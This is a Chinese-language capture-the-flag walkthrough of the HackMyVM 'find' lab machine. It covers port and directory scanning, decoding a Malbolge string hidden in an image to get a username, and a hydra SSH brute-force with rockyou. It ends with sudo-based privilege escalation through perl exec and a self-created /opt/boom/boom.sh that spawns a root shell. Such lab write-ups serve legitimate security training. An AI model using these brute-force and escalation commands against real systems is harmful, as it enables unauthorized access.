HackMyVM-find-Walkthrough

信息收集

常规扫描

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l                                 
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0c       (Unknown: locally administered)
192.168.56.100  08:00:27:1c:21:55       (Unknown)
192.168.56.111  08:00:27:43:fe:8f       (Unknown) 靶机ip

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.872 seconds (136.75 hosts/sec). 3 responded
                                                                                                               
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -p- -A 192.168.56.111 -oN .find   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-06 23:07 EDT
Nmap scan report for 192.168.56.111
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6e:f7:90:04:84:0d:cd:1e:5d:2e:da:b1:51:d9:bf:57 (RSA)
|   256 39:5a:66:38:f7:64:9a:94:dd:bc:b6:fb:f8:e7:3f:87 (ECDSA)
|_  256 8c:26:e7:26:62:77:16:40:fb:b5:cf:a6:1c:e0:f6:9d (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:43:FE:8F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 192.168.56.111

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds

通过whatweb看了下80端口是apache默认页面

既然他靶机名字叫find那就目录扫描一下

用feroxbuster扫不出来，只扫出一堆apache说明文档，换成gobuster就轻松出来了

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.56.111 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt,jpg,zip,png,html           
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.111
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,png,html,txt,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/cat.jpg              (Status: 200) [Size: 35137]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.111/manual/]
/robots.txt           (Status: 200) [Size: 13]
Progress: 29743 / 1245864 (2.39%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 29751 / 1245864 (2.39%)
===============================================================
Finished
===============================================================

有个cat.jpg和robots.txt，那就看看吧

看了下robots.txt的提示那这个cat.jpg大概率跟user用户有关

用wget把cat.jpg先down下来

cat了一下，发现最后有一段类似于什么编码之类的字符串，得到这一信息然而不知道从哪入手

后面查看了图片的exif信息看到了文件源地址https://commons.wikimedia.org/wiki/File:Cat03.jpg

┌──(kali㉿kali)-[~]
└─$ exiftool cat.jpg 
ExifTool Version Number         : 12.76
File Name                       : cat.jpg
Directory                       : .
File Size                       : 35 kB
File Modification Date/Time     : 2022:05:10 00:51:14-04:00
File Access Date/Time           : 2024:07:06 23:55:49-04:00
File Inode Change Date/Time     : 2024:07:06 23:55:42-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Comment                         : File source: https://commons.wikimedia.org/wiki/File:Cat03.jpg
Image Width                     : 481
Image Height                    : 480
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 481x480
Megapixels                      : 0.231

然而并没有什么软用

悄咪咪的看了下WP，发现最后这串字符串是malbolge编程语言

通过在线网站解得密文为missyred

hydra爆破SSH

这大概率是user的用户名那就利用九头蛇hydra无脑爆破一下ssh

很快就出密码了

┌──(kali㉿kali)-[~]
└─$ hydra -l missyred -P /usr/share/wordlists/rockyou.txt 192.168.56.111 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-07 01:46:20
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.111:22/
[22][ssh] host: 192.168.56.111   login: missyred   password: iloveyou  ###这是密码
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-07 01:46:35

提权missyred用户

ssh连上后发现missyred用户有sudo权限

missyred@find:/home/kings$ sudo -l
[sudo] password for missyred: 
Matching Defaults entries for missyred on find:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User missyred may run the following commands on find:
    (kings) /usr/bin/perl

后面就简单了，常规的使用sudo提权，利用perl提权到kings用户下可以读到家目录的user.txt

missyred@find:/home/kings$ sudo -u kings /usr/bin/perl -e 'exec "/bin/bash";'
kings@find:~$ cat user.txt |base64
ZjRlNjkwZjYzOGMwMWJkOGExOWZiMTM0OWQ0MDUxOWMK

查看kings用户下也有sudo权限

提权Root

Sudo提权

kings@find:~$ sudo -l
Matching Defaults entries for kings on find:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kings may run the following commands on find:
    (ALL) NOPASSWD: /opt/boom/boom.sh

然鹅发现并没有这个文件，那就手动建一个

kings@find:~$ mkdir /opt/boom
kings@find:~$ echo "/bin/bash" >/opt/boom/boom.sh
kings@find:~$ chmod +x /opt/boom/boom.sh
kings@find:~$ sudo /opt/boom/boom.sh 		##如果没有指定-u那就默认是root用户
root@find:~# cat root.txt |base64
YzhhYWYwZjMxODllMDAwMDA2YzMwNWJiZmNiZWI3OTAK

最后就结束了，这个靶机还是比较easy的，只不过第一步的字符串是猜不到是什么，后面基本就一路sudo提权就好了